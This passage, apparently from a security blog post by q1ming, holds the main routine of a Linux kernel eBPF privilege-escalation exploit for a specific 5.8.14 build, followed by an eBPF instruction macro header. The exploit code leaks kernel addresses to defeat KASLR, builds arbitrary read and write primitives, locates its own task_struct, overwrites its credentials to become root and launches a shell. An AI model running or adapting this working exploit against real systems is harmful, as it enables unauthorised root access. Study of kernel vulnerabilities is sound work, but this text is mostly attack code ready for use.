 * Fixes vs. original: load_prog() was passed &progN (incompatible pointer
 * type struct bpf_insn (*)[N]) instead of the array itself, and a failed
 * task walk left my_task == -1 which was then dereferenced — now guarded.
 */
int main(){

	save_status();
	bindCore(0);

	/* map whose value area the OOB leak and the AAR/AAW programs share;
	 * VULREG hard-codes its fd as 3, so create it first */
	map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
	if (map_fd < 0) perror("BPF_MAP_CREATE");

	expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
	if (expmap_fd < 0) perror("BPF_MAP_CREATE");

	size_t key = 0;
	size_t value[0x1000];
	value[0] = 1LL;		/* makes VULREG's runtime path end with r6 = 2 */
	value[1] = 0LL;
	bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

	trigger_prog(load_prog(prog1, sizeof(prog1)/sizeof(prog1[0])));

	value[0] = 0x1234;
	bpf_map_get_elem(map_fd, &key, value);
	printf("leak : %p\n", (void *)value[0]);
	printf("map_wait_list : %p\n", (void *)value[1]);

	/* NOTE(review): every constant below (leaked-pointer base, init_task
	 * address, struct offsets) is specific to this exact 5.8.14 build —
	 * regenerate them from the target's System.map / vmlinux. */
	ker_offset = value[0] - 0xffffffff82017a80;
	printf("ker_offset == %p\n", (void *)ker_offset);
	size_t page_base_offset = value[1] & 0xfffffffff0000000;
	printf("page_base_offset == %p\n", (void *)page_base_offset);

	init_task = ker_offset + 0xffffffff82412840;
	comm_off = 0x648;	/* offset of comm within task_struct (this build) */
	cred_off = 0x630;	/* offset of cred within task_struct (this build) */
	task_off = 0x390;	/* offset of the tasks list head (this build) */

	if(prctl(PR_SET_NAME, "QianYiming", NULL, NULL, NULL) < 0){
		perror("prctl set name");
	}

	int r = load_prog(prog2, sizeof(prog2)/sizeof(prog2[0]));
	size_t my_task = -1;
	size_t task = init_task + task_off;
	/* walk at most 100 tasks looking for our freshly-set comm */
	for(int i = 0; i < 100; i++){
		task = aar(task, r);
		size_t name = aar(task-task_off+comm_off, r);
		if(!memcmp(&name, "QianYiming", 8)){
			my_task = task - task_off;
			break;
		}
	}
	if (my_task == (size_t)-1) {
		puts("[-] own task_struct not found");
		return 1;
	}
	size_t my_cred = aar(my_task + cred_off, r);
	printf("my_cred == %p\n", (void *)my_cred);

	int w = load_prog(prog3, sizeof(prog3)/sizeof(prog3[0]));
	/* zero the first six id qwords of our struct cred -> root */
	for(int i = 0; i <= 0x28; i += 8){
		aaw(my_cred + i, w, 0LL);
	}
	system("/bin/sh");
	return 0;
}



bpf_insn.h:

/* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */
/* eBPF instruction mini library */
/* NOTE(review): this appears to mirror the kernel tree's
 * samples/bpf/bpf_insn.h so the exploit builds without kernel sources —
 * verify the encodings against the target kernel version before reuse.
 */
#ifndef __BPF_INSN_H
#define __BPF_INSN_H

struct bpf_insn;

/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */

#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

#define BPF_ALU32_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */

#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

#define BPF_ALU32_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

/* Short form of mov, dst_reg = src_reg */

#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

/* Short form of mov, dst_reg = imm32 */

#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

/* 16-byte wide instruction: expands to TWO struct bpf_insn entries */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */

#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/*
 * Atomic operations:
 *
 * BPF_ADD *(uint *) (dst_reg + off16) += src_reg
 * BPF_AND *(uint *) (dst_reg + off16) &= src_reg
 * BPF_OR *(uint *) (dst_reg + off16) |= src_reg
 * BPF_XOR *(uint *) (dst_reg + off16) ^= src_reg
 * BPF_ADD | BPF_FETCH src_reg = atomic_fetch_add(dst_reg + off16, src_reg);
 * BPF_AND | BPF_FETCH src_reg = atomic_fetch_and(dst_reg + off16, src_reg);
 * BPF_OR | BPF_FETCH src_reg = atomic_fetch_or(dst_reg + off16, src_reg);
 * BPF_XOR | BPF_FETCH src_reg = atomic_fetch_xor(dst_reg + off16, src_reg);
 * BPF_XCHG src_reg = atomic_xchg(dst_reg + off16, src_reg)
 * BPF_CMPXCHG r0 = atomic_cmpxchg(dst_reg + off16, r0, src_reg)
 */

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = OP })

/* Legacy alias */
#define BPF_STX_XADD(SIZE, DST, SRC, OFF) BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* Memory store, *(uint *) (dst_reg + off16) = imm32 */

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })

/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc + off16 */

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })

/* Raw code statement block */

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM })

/* Program exit */

#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })

#endif


文章作者: q1ming
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !
  目录